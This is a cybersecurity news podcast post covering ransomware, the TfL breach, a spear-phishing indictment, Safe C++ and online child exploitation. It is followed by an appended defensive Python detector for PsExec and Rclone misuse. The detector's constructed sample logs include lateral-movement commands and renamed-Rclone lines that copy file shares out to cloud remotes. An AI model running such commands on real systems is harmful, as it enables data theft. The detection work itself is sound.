{"id":46515,"date":"2024-09-17T19:54:16","date_gmt":"2024-09-17T23:54:16","guid":{"rendered":"https:\/\/www.technewsday.com\/?p=46515"},"modified":"2025-05-31T22:45:56","modified_gmt":"2025-06-01T02:45:56","slug":"london-transit-insists-30000-employees-come-in-person-to-change-their-passwords-cyber-security-today-for-wednesday-september-18-2024","status":"publish","type":"post","link":"https:\/\/technewsday.com\/staging\/london-transit-insists-30000-employees-come-in-person-to-change-their-passwords-cyber-security-today-for-wednesday-september-18-2024\/","title":{"rendered":"London transit insists 30,000 employees come in person to change their passwords: Cyber Security Today for Wednesday, September 18, 2024"},"content":{"rendered":"<p><span style=\"font-weight: 400;\">New Ransomware Group Repellent Scorpius Emerges, Transport for London (TfL) Mandates In-Person Password Resets After Cyberattack, Chinese National Charged in Major Multi-Year Spear-Phishing Campaign, C++ Community Hits Back Against Critics, and Cyber Crooks Aren\u2019t Only Stealing Data: Some Are a Real Threat to the Safety and Well-Being of Our Kids.<\/span><\/p>\n<p><iframe style=\"border: none;\" title=\"Embed Player\" src=\"https:\/\/play.libsyn.com\/embed\/episode\/id\/33099862\/height\/192\/theme\/modern\/size\/large\/thumbnail\/yes\/custom-color\/2f3336\/time-start\/00:00:00\/playlist-height\/200\/direction\/backward\/font-color\/FFFFFF\" width=\"100%\" height=\"192\" scrolling=\"no\" allowfullscreen=\"allowfullscreen\"><\/iframe><br \/>\n<span style=\"font-weight: 400;\">Palo Alto Networks\u2019 Unit 42 has issued a report on a new ransomware-as-a-service group, Repellent Scorpius, which distributes the Cicada3301 ransomware. 
First detected in May 2024, the group is rapidly expanding its operations through an affiliate program.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Repellent Scorpius employs a double extortion scheme: it encrypts systems and threatens to publish the data it stole first.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Initial access is often gained through stolen credentials, likely purchased from initial access brokers.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">The group uses legitimate tools, PsExec for lateral movement and Rclone for data exfiltration, which makes its activity harder to tell apart from routine administration.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">The Cicada3301 ransomware itself is a 64-bit binary written in Rust that uses the ChaCha20 stream cipher for file encryption, which Unit 42 reads as a sign of technical sophistication.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">The group targets a wide range of sectors but avoids Commonwealth of Independent States countries &#8211; Russia and its allies.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Beyond the standard advice to tighten credential management and maintain a strong backup strategy, IT teams should watch for unauthorized use of legitimate tools like PsExec and Rclone: a PsExec service appearing on a host, or an Rclone binary, possibly renamed, pushing data to a cloud remote from a machine that has no business doing so.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">This group is relatively new and still growing. 
As Repellent Scorpius expands its affiliate program, Unit 42 is warning of an increase in Cicada3301 ransomware activity and victims.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Sources include: Unit 42 Incident Response team, Palo Alto Networks <\/span><a href=\"https:\/\/unit42.paloaltonetworks.com\/repellent-scorpius-cicada3301-ransomware\/\"><span style=\"font-weight: 400;\">Threat Assessment: Repellent Scorpius, Distributors of Cicada3301 Ransomware (paloaltonetworks.com)<\/span><\/a><\/p>\n<p>***<\/p>\n<p><span style=\"font-weight: 400;\">Transport for London (TfL) is requiring all 30,000 employees to reset their passwords in person following a recent cybersecurity incident. This unusual move highlights the severity of the breach and the importance of identity verification in its aftermath: once an attacker may hold accounts or mailbox access, the usual remote reset channels, such as helpdesk calls and self-service portals, can no longer prove who is asking, so identity has to be checked against something the attacker cannot present.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">TfL disclosed the breach on September 2. Later updates revealed that customer and employee directory data, including email addresses and job titles, were accessed. 
The attack disrupted internal systems and online services, affecting customer refunds and responses to customer enquiries.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">A 17-year-old suspect has been arrested by the UK&#8217;s National Crime Agency in connection with the attack.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">While the onsite validation of 30,000 employees may seem extreme, it mirrors similar actions taken by other organizations, such as DICK&#8217;S Sporting Goods, following cyberattacks, potentially signaling a new best practice in breach response.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Sources include: BleepingComputer, Transport for London<\/span><\/p>\n<p><a href=\"https:\/\/www.bleepingcomputer.com\/news\/security\/tfl-requires-in-person-password-resets-for-30-000-employees-after-hack\/\"><span style=\"font-weight: 400;\">https:\/\/www.bleepingcomputer.com\/news\/security\/tfl-requires-in-person-password-resets-for-30-000-employees-after-hack\/<\/span><\/a><\/p>\n<p>***<\/p>\n<p><span style=\"font-weight: 400;\">The U.S. Department of Justice has charged a Chinese national, Song Wu, with conducting a multi-year spear-phishing campaign targeting NASA, U.S. military branches, and the Federal Aviation Administration (FAA).<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Wu, a 39-year-old engineer at Aviation Industry Corporation of China (AVIC), allegedly impersonated U.S.-based researchers to obtain sensitive aerospace software.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Wu\u2019s targets included NASA, the U.S. 
Air Force, Navy, Army, FAA, major research universities, and aerospace companies.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">The campaign aimed to acquire specialized software and even source code used in aerospace engineering and computational fluid dynamics, potentially applicable to advanced tactical missiles and weapons design.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Wu faces 14 counts of wire fraud and 14 counts of aggravated identity theft, with a potential sentence of up to 20 years per wire fraud count.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">What stands out is the way these nation states play the long game, spending years building trust to get at systems that should be tightly protected.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Organizations, especially those handling sensitive or classified information, should not only review and strengthen their defenses but also build this long-game perspective into their training and controls against spear-phishing: a request from a familiar-looking researcher for software or source code deserves verification through a channel the requester did not supply.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Sources include: U.S. Department of Justice, Security Affairs<\/span><\/p>\n<p><a href=\"https:\/\/securityaffairs.com\/168514\/cyber-crime\/chinese-man-spear-phishing-nasa-us-government.html\"><span style=\"font-weight: 400;\">https:\/\/securityaffairs.com\/168514\/cyber-crime\/chinese-man-spear-phishing-nasa-us-government.html<\/span><\/a><\/p>\n<p>***<\/p>\n<p><span style=\"font-weight: 400;\">The C++ community is hitting back at critics with a new Safe C++ Extensions proposal, which they claim is a significant step towards addressing the memory safety issues that have long plagued the language. 
This move comes in response to growing pressure from the NSA, CISA, and the White House, as well as many in the private sector, for increased memory safety in software.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">That pressure has led to a movement towards memory-safe languages like Rust, and to some vigorous debates, not all of which are technical. Those conflicts recently led one of the maintainers of the Rust for Linux project, which is bringing Rust into the Linux kernel, to resign.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Proponents of C++ say the proposal adds memory safety features to C++ through a safe subset with a borrow checker modelled on Rust&#8217;s, addressing vulnerabilities like buffer overflows and use-after-free errors.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">They argue this approach allows for incremental adoption of safety features in existing C++ codebases, potentially reducing the need for complete rewrites in other languages.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">While promising, the effectiveness of these extensions in real-world code remains to be seen; the proposal is not yet part of the standard, and nothing is gained until existing code is actually migrated into the safe subset.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">It will be interesting to see whether this movement can reverse the move towards Rust, which Google has claimed is not only safer but also makes developers more productive.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Sources include: The Register<\/span><\/p>\n<p><a href=\"https:\/\/www.theregister.com\/2024\/09\/16\/safe_c_plusplus\/?td=rt-3a\"><span style=\"font-weight: 400;\">https:\/\/www.theregister.com\/2024\/09\/16\/safe_c_plusplus\/?td=rt-3a<\/span><\/a><\/p>\n<p>***<\/p>\n<p><span style=\"font-weight: 400;\">We normally focus on the impact of cyber crime on corporations, but there is an alarming trend that concerns us as parents as well as cybersecurity professionals: urgent warnings about severe online dangers targeting children and teens.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Krebs on Security reported on recent 
investigations, echoed by Canada\u2019s RCMP, which have uncovered organized groups using highly manipulative and harmful tactics on popular platforms.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Predatory groups are recruiting on mainstream platforms like Discord, Minecraft, Roblox, Steam, Telegram, and Twitch.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">These groups, such as &#8220;764&#8221;, use extortion, doxing, swatting, and harassment to victimize children.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Some are coercing minors into self-harm, including carving abusers&#8217; aliases into their skin. Victims have been manipulated into harming themselves, family members, and pets. In extreme cases, this has led to suicide attempts.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">These victims are used in cyber-attacks and are also made to produce content, both political and sexual, for their exploiters.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">What parents and security professionals can do:<\/span><\/p>\n<p><span style=\"font-weight: 400;\">&#8211; Implement strict monitoring and controls on children&#8217;s online activities<\/span><\/p>\n<p><span style=\"font-weight: 400;\">&#8211; Educate children about these specific dangers and manipulation tactics<\/span><\/p>\n<p><span style=\"font-weight: 400;\">&#8211; Report suspicious activities to platform moderators and law enforcement immediately<\/span><\/p>\n<p><span style=\"font-weight: 400;\">&#8211; Advocate for stronger safety measures and age verification on all youth-oriented platforms<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Sources include: Wired, Der Spiegel, Recorder, The Washington Post, Royal Canadian Mounted Police, KrebsOnSecurity<\/span><\/p>\n<p><span style=\"font-weight: 400;\">That\u2019s our show for today.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Show notes are at technewsday.ca or .com<\/span><\/p>\n<p>I&#8217;m your host Jim Love. 
Thanks for listening.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>New Ransomware Group Repellent Scorpius Emerges, Transport for London (TfL) Mandates In-Person Password Resets After Cyberattack, Chinese National Charged in Major Multi-Year Spear-Phishing Campaign, C++ Community Hits Back Against Critics, and Cyber Crooks Aren\u2019t Only Stealing Data: Some Are a Real Threat to the Safety and Well-Being of Our Kids. Palo Alto Networks\u2019 Unit 42 has issued [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":46518,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"video","meta":{"_acf_changed":false,"footnotes":""},"categories":[1459,360],"tags":[741],"class_list":["post-46515","post","type-post","status-publish","format-video","has-post-thumbnail","hentry","category-cyber-security-today","category-podcasts","tag-podcasts-cyber-security-today","post_format-post-format-video"],"acf":[],"_links":{"self":[{"href":"https:\/\/technewsday.com\/staging\/wp-json\/wp\/v2\/posts\/46515","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/technewsday.com\/staging\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/technewsday.com\/staging\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/technewsday.com\/staging\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/technewsday.com\/staging\/wp-json\/wp\/v2\/comments?post=46515"}],"version-history":[{"count":3,"href":"https:\/\/technewsday.com\/staging\/wp-json\/wp\/v2\/posts\/46515\/revisions"}],"predecessor-version":[{"id":46532,"href":"https:\/\/technewsday.com\/staging\/wp-json\/wp\/v2\/posts\/46515\/revisions\/46532"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/technewsday.com\/staging\/wp-json\/wp\/v2\/media\/46518"}],"wp:attachment":[{"href":"https:\/\/technewsday.com\/staging\/wp-json\/wp\/v2\/media?parent=46515"}],"wp:term":[{"taxonomy":"category","embeddable":true,"hre
f":"https:\/\/technewsday.com\/staging\/wp-json\/wp\/v2\/categories?post=46515"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/technewsday.com\/staging\/wp-json\/wp\/v2\/tags?post=46515"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
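The Repellent Scorpius item above ends with the advice to watch for unauthorized use of PsExec and Rclone. The following is an added example, not code from the Unit 42 report or from this site, showing one way to run that check over process-creation telemetry. It assumes Sysmon Event ID 1 fields (Image, OriginalFileName, CommandLine, ParentImage, User, Computer) flattened to key=value pairs; the log lines, host names and the allowlists of approved PsExec users and Rclone hosts are constructed for illustration and stand in for local policy.

```python
"""Flag PsExec and Rclone execution that falls outside local policy.

Added example, not code from the Unit 42 report. SAMPLE_LOG is constructed to
mimic Sysmon Event ID 1 (process creation) flattened to key=value pairs; the
Sysmon field names are real, the hosts, users and allowlists are assumptions.
"""
import re

# Assumed policy (adjust to your environment): accounts allowed to run PsExec,
# and hosts sanctioned to run rclone (e.g. a backup server). Compared lowercased.
ALLOWED_PSEXEC_USERS = {"corp\\svc-deploy"}
ALLOWED_RCLONE_HOSTS = {"backup01"}

# The PE version resource (OriginalFileName) survives renaming the file on disk.
# Sysinternals ships PsExec with OriginalFileName "psexec.c"; rclone ships as "rclone.exe".
PSEXEC_NAMES = {"psexec.exe", "psexec64.exe", "psexec.c"}
RCLONE_VERBS = {"copy", "sync", "move", "copyto", "moveto"}
# An rclone remote looks like "name:path"; a Windows drive such as "C:\" does not count.
REMOTE_SPEC = re.compile(r"^[A-Za-z0-9_-]+:(?![\\/])")
FIELD = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_event(line):
    """Turn 'Key=value Key2="quoted value"' into a dict."""
    return {k: (q if q else u) for k, q, u in FIELD.findall(line)}


def basename(path):
    """Lowercased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def looks_like_rclone_cmdline(cmdline):
    """True if the arguments carry an rclone data-movement verb plus a remote spec."""
    args = cmdline.split()[1:]
    has_verb = any(a.lower() in RCLONE_VERBS for a in args)
    has_remote = any(REMOTE_SPEC.match(a) for a in args)
    return has_verb and has_remote


def detect(log_lines):
    """Return (rule, host, image) tuples for events an analyst should look at."""
    findings = []
    for line in log_lines:
        ev = parse_event(line)
        image = basename(ev.get("Image", ""))
        orig = ev.get("OriginalFileName", "").lower()
        user = ev.get("User", "").lower()
        host = ev.get("Computer", "").lower()
        cmd = ev.get("CommandLine", "")

        # Source side of PsExec: the client binary, caught even if renamed.
        if image in PSEXEC_NAMES or orig in PSEXEC_NAMES:
            if user not in ALLOWED_PSEXEC_USERS:
                findings.append(("psexec_unauthorized_user", host, image))
        # Target side of PsExec: the service it drops and starts on the remote host.
        elif image == "psexesvc.exe":
            findings.append(("psexec_service_on_target", host, image))

        is_rclone = image == "rclone.exe" or orig == "rclone.exe"
        if is_rclone and host not in ALLOWED_RCLONE_HOSTS:
            rule = "rclone_renamed" if image != "rclone.exe" else "rclone_unsanctioned_host"
            findings.append((rule, host, image))
        elif not is_rclone and looks_like_rclone_cmdline(cmd):
            # Version resource stripped or absent: fall back to the command-line shape.
            findings.append(("rclone_cmdline_shape", host, image))
    return findings


# Constructed sample telemetry (not real logs).
SAMPLE_LOG = [
    # Sanctioned deployment account pushing a script with PsExec: no finding.
    'Computer=jump01 User="CORP\\svc-deploy" Image="C:\\Tools\\PsExec.exe" OriginalFileName=psexec.c '
    'ParentImage="C:\\Windows\\System32\\cmd.exe" CommandLine="PsExec.exe \\\\web07 -s cmd /c deploy.bat"',
    # Renamed PsExec run from a user profile by an ordinary account.
    'Computer=ws042 User="CORP\\jsmith" Image="C:\\Users\\jsmith\\Downloads\\ps.exe" OriginalFileName=psexec.c '
    'ParentImage="C:\\Windows\\System32\\cmd.exe" CommandLine="ps.exe \\\\fs01 -u corp\\admin cmd"',
    # Target side: the PSEXESVC service started by services.exe on the file server.
    'Computer=fs01 User="NT AUTHORITY\\SYSTEM" Image="C:\\Windows\\PSEXESVC.exe" OriginalFileName=psexesvc.exe '
    'ParentImage="C:\\Windows\\System32\\services.exe" CommandLine="C:\\Windows\\PSEXESVC.exe"',
    # Sanctioned backup host syncing to cloud storage: no finding.
    'Computer=backup01 User="CORP\\svc-backup" Image="C:\\Program Files\\rclone\\rclone.exe" OriginalFileName=rclone.exe '
    'ParentImage="C:\\Windows\\System32\\svchost.exe" CommandLine="rclone.exe sync D:\\Backups azb:nightly --transfers 8"',
    # Rclone renamed to look like a system binary, copying a share off a workstation.
    'Computer=ws042 User="CORP\\jsmith" Image="C:\\Users\\Public\\svchost.exe" OriginalFileName=rclone.exe '
    'ParentImage="C:\\Windows\\System32\\cmd.exe" CommandLine="svchost.exe copy \\\\fs01\\Finance mega:dump --transfers 32 -q"',
    # Ordinary browser activity: no finding.
    'Computer=ws017 User="CORP\\akhan" Image="C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" OriginalFileName=chrome.exe '
    'ParentImage="C:\\Windows\\explorer.exe" CommandLine="chrome.exe --type=renderer"',
    # Version resource stripped, so only the command-line shape gives it away.
    'Computer=ws023 User="CORP\\mlee" Image="C:\\ProgramData\\upd.exe" '
    'ParentImage="C:\\Windows\\System32\\cmd.exe" CommandLine="upd.exe copy C:\\Shares\\HR s3:hr-dump -P"',
]

if __name__ == "__main__":
    for rule, host, image in detect(SAMPLE_LOG):
        print(f"{rule:28s} host={host:10s} image={image}")
```

Two points worth noting about the design. The OriginalFileName check is what catches a renamed binary; the built-in Windows Security event 4688 does not carry that field, so this needs Sysmon or an EDR feed. On the target side, the PSEXESVC process is one signal; the corresponding System log event 7045 (a new service installed) for PSEXESVC is the other, and correlating the two with the account named in the service-install event is how you attribute who ran PsExec.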